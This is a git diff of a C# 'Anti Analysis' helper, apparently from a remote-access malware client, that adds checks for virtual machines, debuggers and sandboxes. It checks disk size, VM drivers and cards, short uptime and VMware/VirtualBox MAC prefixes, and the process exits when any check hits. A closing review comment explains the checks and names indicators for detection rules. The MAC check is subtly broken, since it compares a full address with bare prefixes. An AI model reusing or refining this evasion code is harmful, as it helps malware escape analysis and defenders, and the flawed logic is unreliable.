Add files via upload
parent
279566d29c
commit
0e5870a795
@ -1,26 +1,95 @@
|
|||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
|
using System.Linq;
|
||||||
using System.Management;
|
using System.Management;
|
||||||
using System.Runtime.InteropServices;
|
using System.Net.NetworkInformation;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
// │ Author : NYAN CAT
|
|
||||||
// │ Name : Anti Analysis v0.2
|
// │ Author : NYAN CAT
|
||||||
// │ Contact : https://github.com/NYAN-x-CAT
|
// │ Name : Anti Analysis v0.2
|
||||||
|
// │ Contact : https://github.com/NYAN-x-CAT
|
||||||
// This program is distributed for educational purposes only.
|
|
||||||
|
// This program is distributed for educational purposes only.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
namespace Client.Helper
|
namespace Client.Helper
|
||||||
{
|
{
|
||||||
|
|
||||||
class Anti_Analysis
|
class Anti_Analysis
|
||||||
{
|
{
|
||||||
|
private static long GB_50 = 50000000000;
|
||||||
public static void RunAntiAnalysis()
|
public static void RunAntiAnalysis()
|
||||||
{
|
{
|
||||||
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
|
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
|
||||||
Environment.FailFast(null);
|
Environment.FailFast(null);
|
||||||
|
}
|
||||||
|
|
||||||
|
internal static bool SmallHDD()
|
||||||
|
{
|
||||||
|
|
||||||
|
// Method One - main drive smaller than 50gb, likely a VM
|
||||||
|
long driveSize = Methods.GetMainDriveSize();
|
||||||
|
if (driveSize <= GB_50 * 2)
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Two - has common card of virtual machine
|
||||||
|
if (HasVMCard())
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Three - checks for vm drivers
|
||||||
|
if (HasVBOXDriver())
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Four - if machine has been on for less than 5 mins
|
||||||
|
if (GetUptime() < TimeSpan.FromMinutes(5))
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Five - has VM mac address
|
||||||
|
if (HasVMMac())
|
||||||
|
return true;
|
||||||
|
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
private static bool HasVMMac()
|
||||||
|
{
|
||||||
|
var macAddr =
|
||||||
|
(
|
||||||
|
from nic in NetworkInterface.GetAllNetworkInterfaces()
|
||||||
|
where nic.OperationalStatus == OperationalStatus.Up
|
||||||
|
select nic.GetPhysicalAddress().ToString()
|
||||||
|
).FirstOrDefault();
|
||||||
|
|
||||||
|
var macs = new[]
|
||||||
|
{
|
||||||
|
"00-05-69",
|
||||||
|
"00:05:69",
|
||||||
|
"000569",
|
||||||
|
"00-50-56",
|
||||||
|
"00:50:56",
|
||||||
|
"005056",
|
||||||
|
"00-0C-29",
|
||||||
|
"00:0C:29",
|
||||||
|
"000C29",
|
||||||
|
"00-1C-14",
|
||||||
|
"00:1C:14",
|
||||||
|
"001C14",
|
||||||
|
"08-00-27",
|
||||||
|
"08:00:27",
|
||||||
|
"080027",
|
||||||
|
};
|
||||||
|
foreach (string mac in macs)
|
||||||
|
{
|
||||||
|
if (mac == macAddr)
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
return false;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
private static bool DetectVirtualMachine()
|
private static bool DetectVirtualMachine()
|
||||||
{
|
{
|
||||||
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
|
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
|
||||||
|
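Review bot: The comment above the first check in `SmallHDD()` says the main drive is "smaller than 50gb", but the condition is `driveSize <= GB_50 * 2`, which is 100,000,000,000 bytes, and the method name describes only the first of the five environment checks it runs (disk size, `HasVMCard()`, `HasVBOXDriver()`, uptime under five minutes, `HasVMMac()`). I would correct the comment to `// Check 1 - main drive is 100 GB (GB_50 * 2) or smaller` and give the method a summary that lists all five checks, so an analyst reading the file sees the real conditions. `HasVMMac()` should likewise carry a comment saying that the literals are the VMware (`00:05:69`, `00:0C:29`, `00:1C:14`, `00:50:56`) and VirtualBox (`08:00:27`) OUI prefixes in three spellings. Those strings, together with the `NetworkInterface.GetAllNetworkInterfaces()` enumeration and the `Environment.FailFast(null)` exit in `RunAntiAnalysis()`, are what a static or behavioural detection rule for this helper would key on. The body of `DetectVirtualMachine()` continues outside the hunk, so whether `SmallHDD()` is called from it cannot be seen here.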